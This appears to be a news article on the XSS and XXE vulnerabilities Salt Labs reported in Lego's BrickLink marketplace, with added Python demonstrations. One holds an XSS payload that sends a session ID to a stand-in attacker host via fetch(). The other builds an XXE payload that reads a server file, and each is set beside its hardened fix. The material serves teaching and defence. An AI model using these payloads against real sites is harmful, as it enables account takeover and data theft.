The Lego Group has moved swiftly to fix a pair of application programming interface (API) security vulnerabilities that existed in its BrickLink digital resale platform, after they were identified by Salt Labs, the research arm of API specialist Salt Security.
With more than a million members, BrickLink is the world’s largest online marketplace for buying and selling second-hand Lego sets. Substantial sums change hands through the eBay-style service, with sought-after kits, such as the Hogwarts Express from Lego’s Harry Potter range, often selling for close to their original retail price. The holiday period is a particularly busy time for the service, not least when duplicate presents are passed on.
The two vulnerabilities were uncovered when Salt’s researchers examined the parts of the BrickLink site that accept user input. Specifically, the “Find Username” dialogue box in BrickLink’s coupon search feature contained a cross-site scripting (XSS) vulnerability, a class of flaw that lets an attacker inject script that runs in a victim’s browser, in the context of the BrickLink site, when the victim follows a specially crafted link.
The research team chained this vulnerability with a session ID exposed on a different page to hijack the victim’s session and take over their account. In the hands of an attacker, the same chain would have allowed full account takeover and the theft of user data. Because the identifier was readable from page content rather than only from a cookie, marking the session cookie HttpOnly on its own would not have stopped the injected script from obtaining it.
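To make the mechanism concrete, the following Python sketch is an added example and not code from BrickLink, Lego or Salt Labs. It renders a constructed "find username" style page two ways, once by interpolating the search string verbatim and once with HTML escaping, then uses the standard library's HTML tokeniser to count how many script elements a browser would execute. The page template, the session identifier and the attacker host are all constructed for illustration.

```python
"""Reflected XSS in a "find username" style search page: vulnerable rendering
beside the escaped fix. Added example; the page layout and payload are
constructed and are not BrickLink's code."""
import html
from html.parser import HTMLParser

# Constructed page template: the search string is reflected into an attribute
# value and into text, and the page also echoes the session identifier (the
# second weakness in the reported chain).
PAGE_TEMPLATE = """<!doctype html>
<html><body>
<form action="/find-username"><input name="q" value="{query_attr}"></form>
<p>Results for: {query_text}</p>
<span id="sid">{session_id}</span>
</body></html>"""


def render_vulnerable(query, session_id):
    """Interpolates the user-supplied search string verbatim: reflected XSS."""
    return PAGE_TEMPLATE.format(query_attr=query, query_text=query,
                                session_id=session_id)


def render_hardened(query, session_id):
    """Encodes < > & " ' so the input cannot close the attribute or start a
    new tag in either context."""
    safe = html.escape(query, quote=True)
    return PAGE_TEMPLATE.format(query_attr=safe, query_text=safe,
                                session_id=html.escape(session_id, quote=True))


class ScriptCounter(HTMLParser):
    """Counts <script> start tags roughly as a browser tokeniser would see them."""

    def __init__(self):
        super().__init__()
        self.scripts = 0

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.scripts += 1


def injected_scripts(page):
    """Number of <script> elements a browser would execute in the page."""
    counter = ScriptCounter()
    counter.feed(page)
    counter.close()
    return counter.scripts


# Constructed payload for a crafted link: closes the value="" attribute, then
# injects a script that reads the session id out of the DOM and sends it to a
# hypothetical attacker host.
PAYLOAD = ('"><script>fetch("https://attacker.example/?s="'
           '+document.getElementById("sid").textContent)</script>')


if __name__ == "__main__":
    sid = "sess-0123"  # constructed session identifier
    print("vulnerable page executes",
          injected_scripts(render_vulnerable(PAYLOAD, sid)), "script(s)")
    print("hardened page executes",
          injected_scripts(render_hardened(PAYLOAD, sid)), "script(s)")
```

Escaping the reflected input closes the XSS, but the session identifier is still echoed into the page in both versions; that exposure is a separate defect that escaping does not address and that an HttpOnly cookie flag would not mitigate.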
The second vulnerability was in BrickLink’s “Upload to Wanted List” page, which lets users add Lego sets they have their eye on to a watchlist. Salt’s team were able to execute an Extensible Markup Language (XML) External Entity (XXE) injection attack, in which XML input containing a reference to an external entity is processed by a parser that has not been configured to ignore such references. The parser then fetches the referenced resource, for example a file on the server, and folds its contents into the parsed document, which can expose server-side data or cause requests to be made on the server’s behalf.
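The following Python example is added here to show the XXE mechanism in working code; it is not BrickLink's upload handler, and the "wanted list" XML format, the file contents and the set numbers are constructed. It parses the same uploaded document twice with the standard library's expat-based xml.sax parser: once with external general entity resolution switched on, which is the weak configuration, and once with it left off, which has been the Python default since 3.7.1.

```python
"""XXE: an XML "wanted list" upload parsed with and without external entity
resolution. Added example, not BrickLink's code; uses the standard library's
xml.sax (expat) parser, where the feature is called feature_external_ges."""
import os
import tempfile
import xml.sax
from io import BytesIO
from xml.sax.handler import ContentHandler, feature_external_ges
from xml.sax.xmlreader import InputSource


class ItemCollector(ContentHandler):
    """Collects the text content of every <item> element in the upload."""

    def __init__(self):
        super().__init__()
        self.items = []
        self._buf = None

    def startElement(self, name, attrs):
        if name == "item":
            self._buf = []

    def characters(self, content):
        if self._buf is not None:
            self._buf.append(content)

    def endElement(self, name):
        if name == "item":
            self.items.append("".join(self._buf))
            self._buf = None


def parse_wanted_list(xml_bytes, resolve_external_entities):
    """Parse an uploaded wanted list and return the item texts.

    resolve_external_entities=True is the weak configuration: the parser will
    fetch any external general entity (file or URL) declared in the DTD.
    """
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, resolve_external_entities)
    handler = ItemCollector()
    parser.setContentHandler(handler)
    source = InputSource()
    source.setByteStream(BytesIO(xml_bytes))
    parser.parse(source)
    return handler.items


def xxe_payload(target_path):
    """Constructed attacker upload: declares an external entity that points at
    a server-side file and references it where a set number is expected."""
    return (
        '<?xml version="1.0"?>\n'
        '<!DOCTYPE wanted [<!ENTITY xxe SYSTEM "file://{path}">]>\n'
        '<wanted><item>&xxe;</item><item>12345-1</item></wanted>'
    ).format(path=target_path).encode()


def demo():
    """Returns (items with the weak parser, items with the hardened parser)."""
    # Stand-in for a sensitive server-side file (constructed, written to a
    # temporary file so the example runs offline).
    with tempfile.NamedTemporaryFile("w", delete=False, suffix=".txt") as f:
        f.write("db_password=hunter2")
        secret_path = f.name
    try:
        payload = xxe_payload(secret_path)
        leaked = parse_wanted_list(payload, resolve_external_entities=True)
        safe = parse_wanted_list(payload, resolve_external_entities=False)
    finally:
        os.unlink(secret_path)
    return leaked, safe


if __name__ == "__main__":
    leaked, safe = demo()
    print("weak parser returned:    ", leaked)
    print("hardened parser returned:", safe)
```

With the weak setting the first item comes back as the contents of the file, which the application would then store or display as a set number; with the feature off the entity expands to nothing and the rest of the document is processed normally. The same check applies to any XML library in use: confirm that external entity and DTD processing are disabled before the parser ever sees user-supplied input.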